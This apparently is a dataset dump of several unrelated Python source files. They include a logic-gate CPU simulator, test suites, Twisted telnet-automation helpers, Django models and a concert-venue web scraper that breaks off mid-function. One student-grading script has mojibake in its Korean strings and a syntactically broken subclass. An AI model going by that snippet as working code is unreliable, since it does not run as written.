index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
995,200 | bb8d6c952e97e66ffcd6e123470c597de9a1bfaf | #!/usr/bin/python
# -*- coding: UTF-8 -*-
from logicbit.logic import *
from logicbit.clock import *
from logicbit.utils import *
from logicbit.keyboard import *
class Reg8bTris12b:
def __init__(self):
self.__reg = Register8b()
self.__tristate = TristateBuffer()
def Act(self, Bus, EIn, EOut, Reset, Clk):
A = self.__reg.Act(Bus[0:8], EIn, Reset, Clk)
Dir = LogicBit(1)
A = A + [LogicBit(0), LogicBit(0), LogicBit(0), LogicBit(0)]
[A,B] = self.__tristate.Buffer(A, Bus, Dir, EOut) # Dir=1 and EOut=1 -> put A in B
return B
def Read(self):
return self.__reg.Read()
class PC8bTris: # Program counter of 8 bits with tri-state
def __init__(self):
self.__pc8b = Counter8b()
self.__tristate = TristateBuffer()
def Act(self, Bus, EInc, EOut, Load, Reset, Clk):
A = self.__pc8b.Act(Bus[0:8], EInc, Load, Reset, Clk)
Dir = LogicBit(1)
A = A + [LogicBit(0), LogicBit(0), LogicBit(0), LogicBit(0)]
[A,B] = self.__tristate.Buffer(A, Bus, Dir, EOut) # Dir=1 and EOut=1 -> put A in B
return B
def Read(self):
return self.__pc8b.Read()
class ALU8bTris12b:
def __init__(self):
self.__Alu = ALU8b()
self.__tristate = TristateBuffer()
def Act(self, Bus, A, B, Word, F, SumSub, Alu0, Alu1, AluOut, Clk):
A,CarryBorrow = self.__Alu.Act(A, B, SumSub, Alu0, Alu1)
Dir = LogicBit(1)
A = A + [LogicBit(0), LogicBit(0), LogicBit(0), LogicBit(0)]
# Update F register
Zero = A[7].Not()*A[6].Not()*A[5].Not()*A[4].Not()*A[3].Not()*A[2].Not()*A[1].Not()*A[0].Not()
Mask = Utils.VecBinToPyList([0, 0, 0, 0, 0, 0, 1, 1])
Flags = [Zero,CarryBorrow]+Utils.VecBinToPyList([0, 0, 0, 0, 0, 0])
F.Act(Flags, Mask, Word.FIn, LogicBit(0), Clk)
[A,B] = self.__tristate.Buffer(A, Bus, Dir, AluOut) # Dir=1 and EOut=1 -> put A in B
return B
class MarRegister: # Memory address register
def __init__(self):
self.__reg = Register8b() # 8-bits register
def Act(self, Bus, MarIn, Reset, Clk):
value = self.__reg.Act(Bus, MarIn, Reset, Clk)
return value
def Read(self):
return self.__reg.Read()
class IR: # instruction register
def __init__(self):
self.__reg = Register(12) # 12 bits register
self.__tristate = TristateBuffer()
def Act(self, Bus, IRIn, IROut, Reset, Clk):
Out = self.__reg.Act(Bus, IRIn, Reset, Clk)
Dir = LogicBit(1)
LSB = Out[0:8] # 8 bits
Code = Out
A = LSB + [LogicBit(0), LogicBit(0), LogicBit(0), LogicBit(0)]
[A,B] = self.__tristate.Buffer(A, Bus, Dir, IROut) # Dir=1 and IROut=1 -> put A in B
return B,Code # B=Bus, Code go to instruction decoder
def Read(self):
return self.__reg.Read()
class InstDecoder: # instruction decoder
def __init__(self):
self.__CycleDec = BinaryDecoder()
self.__InstrDec = BinaryDecoder()
self.__cnt = Counter4b()
self.__EndCycle = LogicBit(1)
def Act(self, Word, Code, F, Clk):
nClk = Clk.Not()
Flag = F.Read()
OpCode = Code[8:12]
Input = [LogicBit(0),LogicBit(0),LogicBit(0),LogicBit(0)]
CntBits = self.__cnt.Act(Input, LogicBit(1), LogicBit(0), self.__EndCycle, nClk) # EndCycle reset Counter
Cycle = self.__CycleDec.Act(CntBits)
[NOP,JUMP,LDA,SUM,SUB,LDC,BTR] = self.__InstrDec.Act(OpCode)[:7]
self.__EndCycle = Cycle[5] + Cycle[3]*(JUMP + LDA + LDC + BTR) # Reset counter
Word.PcOut = Cycle[0]
Word.IrOut = Cycle[2]*(JUMP + LDA + SUM + SUB)
Word.MarIn = Cycle[0]
Word.Jump = Cycle[2]*JUMP
Word.RamOut = Cycle[1]
Word.IrIn = Cycle[1]
Word.PcInc = Cycle[1] + Cycle[2]*JUMP + Cycle[2]*BTR*(Code[0]*Flag[0]+Code[1]*Flag[1]+Code[2]*Flag[2]+Code[3]*Flag[3]+Code[4]*Flag[4]+Code[5]*Flag[5]+Code[6]*Flag[6]+Code[7]*Flag[7])
Word.AccIn = Cycle[2]*LDA + Cycle[4]*(SUM + SUB)
Word.AccOut = Cycle[2]*LDC
Word.BIn = Cycle[2]*(SUM + SUB)
Word.CIn = Cycle[2]*LDC
Word.FIn = Cycle[3]*(SUM + SUB)
Word.AluOut = Cycle[4]*(SUM + SUB)
Word.SumSub = Cycle[4]*(SUM.Not() + SUB)
Word.Alu0 = LogicBit(0)
Word.Alu1 = LogicBit(0)
''' Cycle 0 -> PcOut e MarIn
Cycle 1 -> RamOut, IrIn e PcInc.
The control bits will be triggered on the falling edge of the clock.
NOP 0000
JUMP 0001, 2 -> IrOut, PcInc, Jump
LDA 0010, 2 -> IrOut, AccIn
SUM 0011, 2 -> IrOut, BIn; 3 -> FIn; 4 -> SumSub=0, AluOut, AccIn
SUB 0100, 2 -> IrOut, BIn; 3 -> FIn; 4 -> SumSub=1, AluOut, AccIn
LDC 0101, 2 -> AccOut, CIn
BTR 0110, 2 -> PcInc # Opcode = 4bits, Register=4bits, Bit=3bits, SetClear=1 Max 16 register
'''
#Printer(Cycle,"Cycles")
return Word
class Word:
def __init__(self):
self.Reset = LogicBit(0) # Reset all
self.PcInc = LogicBit(0) # Enable increment of the Counter
self.PcOut = LogicBit(0) # Put PC on Bus
self.Jump = LogicBit(0) # Load Bus into PC
self.AccIn = LogicBit(0) # Load Bus into accumulator register
self.AccOut = LogicBit(0) # Put Acc into Bus
self.BIn = LogicBit(0) # Load Bus into B register
self.CIn = LogicBit(0) # Load Bus into C register
self.FIn = LogicBit(0) # Change F register
self.FOut = LogicBit(0) # Put F register into Bus
self.SumSub = LogicBit(0) # Enable sum operation in 0, and subtraction in 1
self.Alu0 = LogicBit(0) #
self.Alu1 = LogicBit(0) #
self.AluOut = LogicBit(0) # Put ALU data into Bus
self.We = LogicBit(0) # Write/Read Ram
self.MarIn = LogicBit(0) # Load Bus into MAR register
self.RamOut = LogicBit(0) # Put Ram data into Bus
self.IrIn = LogicBit(0) # Load Bus into IR register
self.IrOut = LogicBit(0) # Put IR register into Bus
def flogic(clock):
Bus = [LogicBit(0) for bit in range(12)] # initializes 12 bits of the Bus with 0
Pc = PC8bTris() # program counter of 8 bits with tri-state
Mar = MarRegister() # memory address register
Ram = RamTris(8,12) # RAM memory, 8 bits address and 12 bits of data
A = Reg8bTris12b() # Accumulator register
B = Register8b() # B register
F = Register8b_Sb() # Flag register
C = Register8b() # C register
Alu = ALU8bTris12b() # 8-bit arithmetic and logic unit
Ir = IR() # instruction register
InstDec = InstDecoder() # instruction decoder
w = Word() # Control word
# test -> write program in ram
byte00 = Utils.VecBinToPyList([0,0,1,0,1,1,1,1,1,1,0,0]) # 00 LDA fch
byte01 = Utils.VecBinToPyList([0,0,1,1,0,0,0,0,0,0,0,1]) # 01 SUM 01h
byte02 = Utils.VecBinToPyList([0,1,1,0,0,0,0,0,0,0,0,1]) # 03 BTR 01h
byte03 = Utils.VecBinToPyList([0,0,0,1,0,0,0,0,0,0,0,1]) # 04 JUMP 01h
byte04 = Utils.VecBinToPyList([0,0,1,1,0,0,0,0,0,0,1,1]) # 02 SUM 03h
byte05 = Utils.VecBinToPyList([0,1,0,1,0,0,0,0,0,0,0,0]) # 05 LDC
byte06 = Utils.VecBinToPyList([0,0,0,1,0,0,0,0,0,0,0,0]) # 06 JUMP 00h
byte07 = Utils.VecBinToPyList([0,0,0,0,0,0,0,0,0,0,0,0]) # 07
byte08 = Utils.VecBinToPyList([0,0,0,0,0,0,0,0,0,0,0,0]) # 08
byte09 = Utils.VecBinToPyList([0,0,0,0,0,0,0,0,0,0,0,0]) # 09
byte10 = Utils.VecBinToPyList([0,0,0,0,0,0,0,0,0,0,0,0]) # 0A
data = [byte00, byte01, byte02, byte03, byte04, byte05, byte06, byte07, byte08, byte09, byte10]
for value, addr in zip(data, range(len(data))):
addr = Utils.BinValueToPyList(addr,8)
for Clk in [LogicBit(0),LogicBit(1)]:
Ram.Act(value, addr, LogicBit(1), LogicBit(0), LogicBit(0), Clk)
cnt=0
while(clock.GetState()):
Clk = clock.GetClock()
cnt+=1
print("Clock:"+str(Clk)+", cnt="+str(cnt))
Bus = Pc.Act(Bus, w.PcInc, w.PcOut, w.Jump, w.Reset, Clk) # Program counter, 8 bits
Mar.Act(Bus[0:8], w.MarIn, w.Reset, Clk) # Memory address 8 bits register
Bus = Ram.Act(Bus, Mar.Read(), w.We, w.RamOut, LogicBit(0), Clk) # RAM memory, 8 bits address and 12 bits of data
Bus = A.Act(Bus, w.AccIn, w.AccOut, w.Reset, Clk)
B.Act(Bus[0:8], w.BIn, w.Reset, Clk)
C.Act(Bus[0:8], w.CIn, w.Reset, Clk)
Bus = Alu.Act(Bus, A.Read(), B.Read(), w, F, w.SumSub, w.Alu0, w.Alu1, w.AluOut, Clk)
Bus, Code = Ir.Act(Bus, w.IrIn, w.IrOut, w.Reset, Clk) # Instruction register, 12 bits
InstDec.Act(w, Code, F, Clk)
#if (Clk == 1):
Printer(A.Read(),"A")
Printer(B.Read(),"B")
Printer(C.Read(),"C")
Printer(F.Read(),"F")
Printer(Pc.Read(),"Pc")
Printer(Bus, "Bus")
clk = Clock(flogic,1,2) # two samples per state
clk.start() # initialize clock
#key = Keyboard(clk)
#key.start() # initialize keyboard |
995,201 | 44b01679ef55f9e976312d3cfae62a8fda757380 | # with open("student.csv", "w", encoding='utf8') as file:
# file.write ("์ด๋ฆ,์ฑ๋ณ,๋์ด,์ฑ์ \n๊น์ผ์,๋จ,23,90\n์ด์ด์,์ฌ,24,95\n๋ฐ์ผ์,์ฌ,30,85\nํ์ฌ์,๋จ,35,50\n๋ถ์ค์,๋จ,15,70\n๊ณ ์ก์,์ฌ,27,60\n์์น ์,๋จ,25,55\n๋จํ์,๋จ,22,88\n์ค๊ตฌ์,์ฌ,45,99\n์ ์์,๋จ,11,40\n")
# file=open("student.csv", "r")
# with open("student.csv", "r", encoding='utf8') as file:
class Student:
def __init__(self, name, sex, age, score):
self.name = name
self.sex = sex
self.age = age
self.score = score
# if score >=90:
# self.score=self.score+"(Aํ์ )"
# elif score >=80:
# self.score=score("Bํ์ ")
# elif score >=70:
# self.score="Cํ์ "
# else:
# self.score="Dํ์ "
def __str__(self):
return "{}:{}:{}:{}".format(self.name[0]+"**", self.sex, self.age, self.score)
class Point(Student)
def __init__(self, name, sex, age, grade):
self.name = name
self.sex = sex
self.age = age
self.grade = score
if score >=90:
self.score=self.score+"(Aํ์ )"
elif score >=80:
self.score=score("Bํ์ ")
elif score >=70:
self.score="Cํ์ "
else:
self.score="Dํ์ "
def __str__(self):
return "{}:{}:{}:{}".format(self.name[0]+"**", self.sex, self.age, self.score)
students = [
Student("๊น์ผ์", "๋จ", 23, 90),
Student("์ด์ด์", "์ฌ", 24, 95),
Student("๋ฐ์ผ์", "์ฌ", 30, 85),
Student("ํ์ฌ์", "๋จ", 35, 50),
Student("๋ถ์ค์", "๋จ", 15, 70),
Student("๊ณ ์ก์", "์ฌ", 27, 60),
Student("์์น ์", "๋จ", 25, 55),
Student("๋จํ์", "๋จ", 22, 88),
Student("์ค๊ตฌ์", "์ฌ", 45, 99),
Student("์ ์์", "๋จ", 11, 40)
]
# for i in range(0,10):
# t=student[i]
def print_students():
print("--------------------")
for s in students:
print(s)
# sort_students = sorted(students, key = lambda stu: stu.score)
# print_students()
# students.sort(key = lambda stu: stu.score)
# print_students()
students.sort(key = lambda stu: stu.score, reverse=True)
print_students()
|
995,202 | a3cf4434e04c1c8c6dcd31cbc874589ddcce074e | """
Unit tests for the mccscontroller.releaseresources module
"""
from ska_tmc_cdm.messages.mccscontroller.releaseresources import ReleaseResourcesRequest
def test_releaseresourcesrequest_object_equality():
"""
Verify that two ReleaseResourcesRequest objects with the same allocated elements are
considered equal.
"""
constructor_args = dict(
interface="https://schema.skao.int/ska-low-mccs-releaseresources/2.0",
subarray_id=1,
release_all=True,
)
request = ReleaseResourcesRequest(**constructor_args)
# objects with same property values are considered equal
other = ReleaseResourcesRequest(**constructor_args)
assert request == other
# objects where any property differs are considered unequal
different_args = dict(
interface="https://schema.skao.int/ska-low-mccs-releaseresources/999.0",
subarray_id=2,
release_all=False,
)
for k, v in different_args.items():
other_args = dict(constructor_args)
other_args[k] = v
assert request != ReleaseResourcesRequest(**other_args)
def test_releaseresourcesrequest_equality_with_other_objects():
"""
Verify that a ReleaseResourcesRequest is considered unequal to objects of other
types.
"""
constructor_args = dict(
interface="https://schema.skao.int/ska-low-mccs-releaseresources/2.0",
subarray_id=1,
release_all=True,
)
request = ReleaseResourcesRequest(**constructor_args)
assert request != 1
assert request != object()
|
995,203 | 4bb0bc8ad21c6168704a2d869047ba5da8f3824b | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import random
import sorting_algorithms
class Test (unittest.TestCase):
""" Tests for Sorting Algorithms """
array_size = 1000
sort = sorting_algorithms.SortingAlgorithms()
random_items = [random.randint(1, array_size) for num_items in range(array_size)]
def test_bucket_sort(self):
items = self.random_items[:]
self.sort.bucket_sort(items)
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("bucketsort method fails.")
def test_bubble_sort(self):
items = self.random_items[:]
self.sort.bubble_sort(items)
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("bubblesort method fails.")
def test_counting_sort(self):
items = self.random_items[:]
self.sort.counting_sort(items, len(items))
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("countingsort method fails.")
def test_cycle_sort(self):
items = self.random_items[:]
self.sort.cycle_sort(items)
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("cyclesort method fails.")
def test_heap_sort(self):
items = self.random_items[:]
self.sort.heap_sort(items)
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("heap method fails.")
def test_insertion_sort(self):
items = self.random_items[:]
self.sort.insertion_sort(items)
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("insertion method fails.")
def test_merge_sort(self):
items = self.random_items[:]
self.sort.merge_sort(items)
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("merge method fails.")
def test_selection_sort(self):
items = self.random_items[:]
self.sort.selection_sort(items)
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("selection method fails.")
def test_shell_sort(self):
items = self.random_items[:]
self.sort.shell_sort(items)
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("shell method fails.")
def test_quick_sort(self):
items = self.random_items[:]
self.sort.quick_sort(items)
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("quick method fails.")
def test_radix_sort(self):
items = self.random_items[:]
self.sort.radix_sort(items)
for i in range(1, len(items)):
if items[i - 1] > items[i]:
self.fail("radix method fails.")
if __name__ == '__main__':
unittest.main()
|
995,204 | cc345e61ccc04c3e001f311e4262ae281b9a4a9e | '''
@author: shylent
'''
from texpect.mixin import ExpectMixin
from twisted.conch import telnet
from twisted.internet.protocol import ProcessProtocol
class TelnetExpect(telnet.Telnet, ExpectMixin):
"""A ready-made combination of L{Telnet} and L{Expect}, that lets you
utilize L{Expect}'s functionality to automate the Telnet session.
"""
def __init__(self, debug=False, timeout=None, _reactor=None):
ExpectMixin.__init__(self, debug=debug, timeout=timeout, _reactor=_reactor)
telnet.Telnet.__init__(self)
def applicationDataReceived(self, data):
self.expectDataReceived(data)
def connectionLost(self, reason):
telnet.Telnet.connectionLost(self, reason)
ExpectMixin.connectionLost(self, reason)
class ProcessExpect(ProcessProtocol, ExpectMixin):
"""One of the possible ways to "talk" to a subprocess, writing to its stdin
and reading from stdout.
"""
def __init__(self, debug=False, timeout=None, _reactor=None):
ExpectMixin.__init__(self, debug=debug, timeout=timeout, _reactor=_reactor)
def outReceived(self, data):
self.expectDataReceived(data)
def outConnectionLost(self):
ExpectMixin.connectionLost(self, "stdout closed")
|
995,205 | 8eaeda17007acff8d3be25b24ce87b03ec9c473f | from django.db import models
from django.core import checks, exceptions, validators
class Creditos(models.Model):
referencia = models.CharField(max_length=255, blank=True, null=True)
montoentregado = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
fechaactivacion = models.DateField(blank=True, null=True)
credito = models.CharField(max_length=50, blank=True, null=True)
idproducto = models.IntegerField()
cliente = models.CharField(max_length=50, blank=True, null=True)
producto = models.CharField(max_length=255, blank=True, null=True)
producto_corto = models.CharField(max_length=255, blank=True, null=True)
saldo = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
montovencido = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
costos_asociados = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
impuesto = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
impuesto_total = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
iopend = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
vence = models.DateField(blank=True, null=True)
abono = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
diasmora = models.IntegerField(blank=True, null=True)
interes_total = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
cuenta_2001 = models.CharField(max_length=50, blank=True, null=True)
cuenta_respiro = models.CharField(max_length=50, blank=True, null=True)
empresa = models.CharField(max_length=2, blank=True, null=True)
clave = models.CharField(max_length=50, blank=True, null=False, primary_key = True)
cantidad_creditos = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'creditos'
def _check_primary_key(self):
if self.primary_key:
return [
checks.Error(
"AutoFieldNonPrimary must not set primary_key=True. bla bla bla",
obj=self,
id="fields.E100",
)
]
else:
return []
class Gestores(models.Model):
idusuario = models.CharField(max_length=60, blank=True, null=True)
credito = models.CharField(max_length=60, blank=True, null=True)
cliente = models.CharField(max_length=60, blank=True, null=True)
empresa = models.CharField(max_length=10, blank=True, null=True)
fecha = models.DateField()
id = models.IntegerField(primary_key=True)
class Meta:
managed = False
db_table = 'gestores' |
995,206 | cb26e3ac3c3c6353c5deac2bbed72ed5b4cdb0cb | import requests
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
import time
import json
import re
import datetime
#####################################################################################################################################
#####################################################################################################################################
# Useful Functions & Classes #
#####################################################################################################################################
# singleton class to build json object ##############################################################################################
class JsonInstance:
json_array = []
def __init__(self, json_array):
self.json_array = json_array
def append(self, site, venue, event, date, ticketLink):
output = {}
output["site"] = site
output["venue"] = venue
output["event"] = event
output["date"] = date
output["ticketLink"] = ticketLink
self.json_array.append(output)
def output(self, file_name):
name = "./JsonFiles/" + file_name
f = open(name, "w")
f.write(json.dumps(self.json_array))
f.close()
#####################################################################################################################################
def find_by_label(soup, tag, label):
return soup.find(tag, text=re.compile(label)).next_sibling
#####################################################################################################################################
def strip(u_name):
name = re.sub("\n", "", u_name)
name = re.sub("\t", "", name)
return name
#####################################################################################################################################
def format_date(u_date,site):
months ={
"Jan" : "01",
"Feb" : "02",
"Mar" : "03",
"Apr" : "04",
"May" : "05",
"Jun" : "06",
"Jul" : "07",
"Aug" : "08",
"Sep" : "09",
"Oct" : "10",
"Nov" : "11",
"Dec" : "12",
"January" : "01",
"February" : "02",
"March" : "03",
"April" : "04",
"June" : "06",
"July" : "07",
"August" : "08",
"September" : "09",
"October" : "10",
"November" : "11",
"December" : "12",
"Sept" : "09"
}
if u_date == "None":
return u_date
elif u_date == "TBD":
return u_date
elif site == "Ticketmaster":
split = re.split("-", u_date)
year = int(split[0])
month = int(split[1])
remaining = split[2]
split_remaining = re.split(" ", remaining)
day = int(split_remaining[0])
date = datetime.datetime(year, month, day)
return str(date.strftime("%x"))
elif site == "axs":
# split = re.split("-", u_date) ########## idk if this is necessary -> go back and test this
split = re.split(" ", u_date)
year = split[3][2] + split[3][3]
month = months[split[1]]
day = re.split(",",split[2])[0]
return month+"/"+day+"/"+year
elif site == "fonda" or site == "sbbowl":
split = re.sub(",", "", u_date)
split = re.split(" ", split)
year = split[3][2] + split[3][3]
month = months[split[1]]
day = split[2]
return month+"/"+day+"/"+year
elif site == "forum":
u_date = re.sub(",", "", u_date)
split = re.split(" ", u_date)
try:
year = split[2][2] + split[2][3]
date = months[split[0]] + "/"
if int(split[1]) < 10:
split[1] = "0"+split[1]
date += split[1]+"/"
date += year
return date
except:
year = str(datetime.date.today().year)
year = year[2]+year[3]
date = months[str(split[0])] + "/"
if int(split[1]) < 10:
split[1] = "0"+split[1]
date += split[1]+"/"
date += year
return date
elif site == "greekla":
split = re.sub(',', '', u_date)
split = re.sub(" ", " ", split)
split = re.split(" ", split)
date = months[str(split[2])] + "/"
if int(split[3]) < 10:
split[3] = "0"+split[3]
date += split[3]+"/"
year= str(split[4])
date += year[2] + year[3]
return date
elif site == 'greekberkley':
split = re.sub(',', '', u_date)
split = re.sub(" ", " ", split)
split = re.split(" ", split)
date = months[str(split[0])] + "/"
if int(split[1]) < 10:
split[1] = "0"+split[1]
date += split[1]+"/"
year= str(split[2])
date += year[2] + year[3]
return date
elif site == "hollywood":
split = re.split("-", u_date)
date = split[1] + "/" + split[2] +"/"
year = split[0]
date += year[2] + year[3]
return date
elif site == "hondacenter":
year = str(datetime.date.today().year)
split = u_date.replace(".","")
split = re.split(" ", split)
date = months[split[1]] + "/"
if int(split[2]) < 10:
split[2] = "0"+split[2]
date += split[2] + "/" + year[2] + year[3]
return date
elif site == "novo":
split = re.sub(',', '', u_date)
split = re.split(" ", split)
date = months[str(split[1])] + "/"
if int(split[2]) < 10:
split[2] = "0"+split[2]
date += split[2]+"/"
year= str(split[3])
date += year[2] + year[3]
return date
elif site == "shrine":
date = re.sub("@", "", u_date)
date = re.sub(",", "", u_date)
split = re.split(" ", date)
date = months[split[1]] + "/"
if int(split[2]) < 10:
split[2] = "0"+split[2]
date += split[2]+"/"
year= str(split[3])
date += year[2] + year[3]
return date
return u_date
#####################################################################################################################################
def find_year(element):
if hasattr(element.div.previous_sibling, "tribe-events-calendar-list__month-separator"):
return str(element.text).strip()
else:
find_year(element.previous_sibling)
#####################################################################################################################################
def templateFunction(driver, data):
driver.get('https://website.com')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array
headliners = soup.find_all('element', class_='headliner')
featured_headliner1 = soup.select('XPath')
for headliner in headliners:
headliner_array.append(str(headliner.text).strip())
link_array.append(str(headliner['href']).strip())
# select date and add to array
# select link and add to array
# iterate through arrays and add to json object
i = 0
while(i < len(headliner_array)):
data.append("Venue Website", "venue name", headliner_array[i], date_array[i], link_array[i])
i+=1
return
#####################################################################################################################################
#####################################################################################################################################
# Venue Functions #
# Scrape Santa Barbara Bowl #########################################################################################################
def SB(driver, data):
driver.get('https://sbbowl.com/concerts')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array
headliners = soup.find_all('h3', class_='announceTitle')
for headliner in headliners:
name = headliner.find('a')
headliner_array.append(str(name.text).strip())
# select date and add to array
date_parents = soup.find_all('div', class_='span7 concertEmbedDeets')
for date_parent in date_parents:
date = find_by_label(date_parent,'span', 'Date:')
date_array.append(format_date(str(date).strip(), "sbbowl"))
# select link and add to array
ticketLinks = soup.find_all('a', attrs={"data-event-category":"ticket_link"})
for ticketLink in ticketLinks:
link = ticketLink.get('href')
link_array.append(str(link).strip())
# add data to json object
i = 0
while(i < len(headliner_array)):
data.append("Venue Website", "Santa Barbara Bowl", headliner_array[i], date_array[i], link_array[i])
i+=1
return
# Scrape The Fonda Theatre ##########################################################################################################
def fonda(driver, data):
driver.get('https://www.fondatheatre.com/events/all')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array
headliners = soup.find_all('h3', attrs={"class": "carousel_item_title_small"})
for headliner in headliners:
name = headliner.find('a').text
name = strip(name)
headliner_array.append(name)
# select date and add to array
dates = soup.find_all('div', class_="date-time-container")
for date in dates:
date = date.find('span', class_="date").text
date = strip(date)
date = format_date(date, "fonda")
date_array.append(date)
# select link and add to array
ticketLinks = soup.find_all('div', class_='buttons')
# ticketLinks = soup.find_all('a', class_="btn-tickets accentBackground widgetBorderColor secondaryColor tickets status_1")
for ticketLink in ticketLinks:
link = ticketLink.find('a')
link = link.get('href')
link_array.append(str(link).strip())
# iterate through arrays and add to json object
i = 0
while(i < len(headliner_array)):
data.append("Venue Website", "The Fonda Theatre", headliner_array[i], date_array[i],link_array[i])
i+=1
return
# Scrape The Forum Inglewood ########################################################################################################
def forum(driver, data):
driver.get('https://thelaforum.com/events/list/')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
incomplete_dates = []
date_array = []
link_array = []
# select headliner and add to array and ticket link
headliners = soup.find_all('a', class_='tribe-events-calendar-list__event-title-link tribe-common-anchor-thin')
for headliner in headliners:
headliner_array.append(str(headliner.text).strip())
link_array.append(str(headliner['href']).strip())
# select date and add to array
date = soup.find_all('span', class_="tribe-event-date-start")
for day in date:
day = format_date(str(day.text), 'forum')
date_array.append(day)
# # iterate through arrays and add to json object
i = 0
while(i < len(headliner_array)):
data.append("Venue Website", "The Forum Inglewood",headliner_array[i], date_array[i], link_array[i])
i+=1
return
# Scrape Greek Theatre Los Angeles ##################################################################################################
def greekLA(driver, data):
driver.get('https://www.lagreektheatre.com/events/all')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array and link
headliners = soup.find_all('a', attrs={'title':'More Info'})
for headliner in headliners:
headliner_array.append(str(headliner.text).strip())
link_array.append(str(headliner['href']).strip())
# select date and add to array
dates = soup.find_all('span', class_="m-date__singleDate")
for date in dates:
date_array.append(format_date(str(date.text).strip(),'greekla'))
# iterate through arrays and add to json object
i = 0
while(i < len(headliner_array)):
data.append("Venue Website", "Greek Theatre Los Angeles", headliner_array[i], date_array[i], link_array[i])
i+=1
return
# Scrape Greek Theatre-U.C. Berkeley ################################################################################################
def greekBerkley(driver, data):
driver.get('https://thegreekberkeley.com/event-listing/')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array
headliners = soup.find_all('h2', class_='show-title')
for headliner in headliners:
headliner_array.append(str(headliner.text).strip())
# select date and add to array
dates = soup.find_all('div', class_='date-show')
for date in dates:
date_array.append(format_date(str(date['content']), 'greekberkley'))
# select link and add to array
links = soup.find_all('a', attrs={'target': '_blank'})
for link in links:
link_array.append(str(link['href']).strip())
# iterate through arrays and add to json object
i = 0
while(i < len(headliner_array)):
data.append("Venue Website", "Greek Theatre-U.C. Berkeley", headliner_array[i], date_array[i], link_array[i])
i+=1
return
# Scrape Hollywood Bowl Hollywood ###################################################################################################
def hollywood(driver, data):
driver.get('https://www.hollywoodbowl.com/events/performances?Venue=Hollywood+Bowl&Season=null')
# scroll down to load whole page
# Get scroll height.
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to the bottom.
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load the page.
time.sleep(3)
# Calculate new scroll height and compare with last scroll height.
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array
headliners = soup.find_all('span', class_="name name--short")
for headliner in headliners:
head = strip(str(headliner.text).strip())
while " " in head:
head = re.sub(" ", " ", head)
headliner_array.append(head)
# select date and add to array
dates = soup.find_all('div', class_="performance-card__anchor")
for date in dates:
day = date['data-day']
day = format_date(day, "hollywood")
date_array.append(day)
# select link and add to array
links = soup.find_all('a', class_="btn performance-buy-btn")
for link in links:
link_array.append(str(link['href']).strip())
# iterate through arrays and add to json object
i = 0
while(i < len(link_array)):
data.append("Venue Website", "Hollywood Bowl Hollywood", headliner_array[i], date_array[i], link_array[i])
i+=1
return
# Scrape Honda Center ###############################################################################################################
def honda(driver, data):
driver.get('https://www.hondacenter.com/events/')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array
headliners = soup.find_all('h2', class_='event-list-name')
for headliner in headliners:
headliner_array.append(str(headliner.text).strip())
# select date and add to array
dates = soup.find_all('div', class_="event-list-time")
for date in dates:
date = format_date(str(date.text).strip(), "hondacenter")
date_array.append(date)
# select link and add to array
links = soup.find_all('a', class_="button-round event-list-ticket-link")
for link in links:
link_array.append(str(link['href']).strip())
# iterate through arrays and add to json object
i = 0
while(i < len(headliner_array)):
data.append("Venue Website", "Honda Center", headliner_array[i], date_array[i], link_array[i])
i+=1
return
# Scrape Microsoft Theater ##########################################################################################################
def microsoft(driver, data):
driver.get('https://www.microsofttheater.com/events/all')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array
